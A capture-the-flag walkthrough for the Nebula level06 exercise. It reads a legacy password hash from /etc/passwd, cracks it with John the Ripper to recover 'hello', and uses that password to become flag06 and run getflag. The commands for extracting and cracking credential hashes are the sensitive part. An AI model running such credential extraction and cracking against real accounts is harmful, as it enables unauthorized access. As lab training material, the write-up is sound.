The flag06 account credentials came from a legacy unix system.

The clue tells us that we might be able to crack the password of the flag06 user. Let’s take a look at the /etc/passwd file.

level06@nebula:~$ grep flag06 /etc/passwd
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

Note that /etc/passwd normally doesn’t contain password hashes. These are stored in /etc/shadow on modern systems. Unlike /etc/passwd, /etc/shadow is not world readable.

The field containing ueqwOCnSGdsuM is a password hash. To crack this we’ll use a piece of software called john the ripper, or john for short. It’s available on the Kali Linux distribution.

root@kali:~# john <(echo "flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh")
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (flag06)
1g 0:00:00:00 DONE 2/3 (2016-07-31 14:33) 100.0g/s 75000p/s 75000c/s 75000C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed

As you can see from the output, we found the password (hello) in less than 1 second!

Let’s use the password to become the flag06 user and run getflag!

level06@nebula:~$ su - flag06
Password:
flag06@nebula:~$ getflag
You have successfully executed getflag on a target account